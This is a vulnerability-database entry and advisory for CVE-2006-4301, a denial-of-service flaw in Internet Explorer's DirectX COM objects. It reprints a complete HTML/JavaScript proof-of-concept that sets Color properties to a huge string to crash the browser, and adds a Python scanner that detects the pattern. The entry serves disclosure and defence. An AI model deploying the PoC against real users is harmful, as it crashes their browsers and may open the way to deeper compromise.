Microsoft Internet Explorer Multiple COM Object Color Property Denial-of-Service Vulnerability

Vulnerability ID: 1110866
Vulnerability type: Input validation
Published: 2006-08-21
Updated: 2007-01-24
CVE ID: CVE-2006-4301
CNNVD-ID: CNNVD-200608-367
Affected platform: Windows
CVSS score: 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/28421
https://cxsecurity.com/issue/WLB-2006080148
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-367
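|Vulnerability details
Internet Explorer is a very popular web browser released by Microsoft. When Internet Explorer handles input to the color property of several COM objects (dxtmsft.dll/dxtmsft3.dll), setting the color property to an overly long string causes Internet Explorer to crash.
|Exploit (PoC)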
source: http://www.securityfocus.com/bid/19640/info

Microsoft Internet Explorer is prone to multiple denial-of-service vulnerabilities that occur when instantiating COM objects. 

The vulnerabilities arise because of the way Internet Explorer tries to instantiate certain COM objects as ActiveX controls, resulting in denial-of-service conditions. Remote code execution may be possible, but this has not been confirmed.

This BID may be related to the issues described in BID 14511 (Microsoft Internet Explorer COM Object Instantiation Buffer Overflow Vulnerability) and BID 15061 (Microsoft Internet Explorer COM Object Instantiation Variant Vulnerability). However, these issues affect a different set of COM objects that were not addressed in the previous BIDs.


<!--

// Internet Explorer Multiple COM Object Color Property DoS Vulnerability
// tested on Windows 2000 SP4/XP SP2

// http://www.xsec.org
// nop (nop#xsec.org)

-->
<html>
<head>
<title></title>
</head>
<body>
<script>
var i =0;
var Objects = new Array(

// CLSID: {3A04D93B-1EDD-4f3f-A375-A03EC19572C4}
// Info: MaskFilter
// ProgID: DXImageTransform.Microsoft.MaskFilter.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.MaskFilter.1",

// CLSID: {421516C1-3CF8-11D2-952A-00C04FA34F05}
// Info: Chroma
// ProgID: DXImageTransform.Microsoft.Chroma.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.Chroma.1",

// CLSID: {9F8E6421-3D9B-11D2-952A-00C04FA34F05}
// Info: Glow
// ProgID: DXImageTransform.Microsoft.Glow.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.Glow.1",

// CLSID: {ADC6CB86-424C-11D2-952A-00C04FA34F05}
// Info: DropShadow
// ProgID: DXImageTransform.Microsoft.DropShadow.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.DropShadow.1",

// CLSID: {E71B4063-3E59-11D2-952A-00C04FA34F05}
// Info: Shadow
// ProgID: DXImageTransform.Microsoft.Shadow.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.Shadow.1",

// CLSID: {8241F015-84D3-11d2-97E6-0000F803FF7A}
// Info: Shapes
// ProgID: DX3DTransform.Microsoft.Shapes.1
// InprocServer32: C:\WINNT\system32\dxtmsft3.dll
"DX3DTransform.Microsoft.Shapes.1",

null
);

var b = "AAAA";

while(b.length < 0x2000000)
{
b += b;
}

while(Objects[i])
{
var a = null;

window.status = "Create Object " + Objects[i] + "...";

try { a = new ActiveXObject(Objects[i]); } catch(e){}

if(a)
{
window.status = "Try Set " + Objects[i] + ".Color ...";
try { a.Color = b;} catch(e){}
}

i++;
}

window.status = "failed!";

</script>
</body>
</html>
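
A defender-side check for the pattern described above, as an added example that is not part of the original advisory or PoC: a static scan of HTML for script that names one of the listed ProgIDs, uses ActiveXObject, and assigns a non-literal or long value to a Color property. The function name, the 32-character threshold, the version-suffix handling and the sample documents are assumptions made for illustration.

```python
import re

# ProgIDs named in the advisory above (dxtmsft.dll / dxtmsft3.dll objects).
WATCHED_PROGIDS = {
    "dximagetransform.microsoft.maskfilter", "dximagetransform.microsoft.chroma",
    "dximagetransform.microsoft.glow", "dximagetransform.microsoft.dropshadow",
    "dximagetransform.microsoft.shadow", "dx3dtransform.microsoft.shapes",
}
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
STRING_RE = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""")
# Assignment to a Color property (not a comparison such as `.Color == x`).
COLOR_SET_RE = re.compile(r"\.\s*color\s*=(?!=)\s*([^;\n]+)", re.I)
MAX_COLOR_LITERAL = 32  # assumption: real colour literals ("#RRGGBB") are short

# Constructed samples (not captured traffic).
SAMPLE_FLAGGED = """<html><body><script>
var ids = ["DXImageTransform.Microsoft.Glow.1", "DX3DTransform.Microsoft.Shapes.1"];
for (var i = 0; i < ids.length; i++) {
  try { var o = new ActiveXObject(ids[i]); o.Color = payload; } catch (e) {}
}
</script></body></html>"""
SAMPLE_BENIGN = """<html><body><script>
document.body.style.color = "#336699";
</script></body></html>"""


def scan_html(html):
    """Return the watched ProgIDs and unbounded Color assignments in one page."""
    progids, risky_sets = set(), []
    for body in SCRIPT_RE.findall(html):
        for _, literal in STRING_RE.findall(body):
            # Assumption: also match version-independent ProgIDs, so drop ".1".
            base = re.sub(r"\.\d+$", "", literal.strip().lower())
            if base in WATCHED_PROGIDS:
                progids.add(literal)
        for rhs in COLOR_SET_RE.findall(body):
            rhs = rhs.strip()
            m = STRING_RE.fullmatch(rhs)
            # A short literal is normal; a variable or long literal cannot be
            # bounded statically, so it is reported.
            if not (m and len(m.group(2)) <= MAX_COLOR_LITERAL):
                risky_sets.append(rhs)
    uses_activex = bool(re.search(r"\bActiveXObject\b", html))
    return {"progids": sorted(progids), "color_assignments": risky_sets,
            "suspicious": bool(progids and uses_activex and risky_sets)}
```

The scan is a heuristic for content filters and triage: script that builds the ProgID string at run time will not be matched by the literal comparison.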
|References

Source: MISC
Link: http://xsec.org/index.php?module=releases&act=view&type=1&id=17
Source: XF
Name: ie-com-color-dos(28516)
Link: http://xforce.iss.net/xforce/xfdb/28516
Source: BID
Name: 19640
Link: http://www.securityfocus.com/bid/19640
Source: BUGTRAQ
Name: 20060821 [XSec-06-09]: Internet Explorer Multiple COM Objects Color Property DoS Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/443907/100/0/threaded
Source: OSVDB
Name: 29525
Link: http://www.osvdb.org/29525
Source: OSVDB
Name: 29524
Link: http://www.osvdb.org/29524
Source: MILW0RM
Name: 4251
Link: http://www.milw0rm.com/exploits/4251
Source: SREASON
Name: 1439
Link: http://securityreason.com/securityalert/1439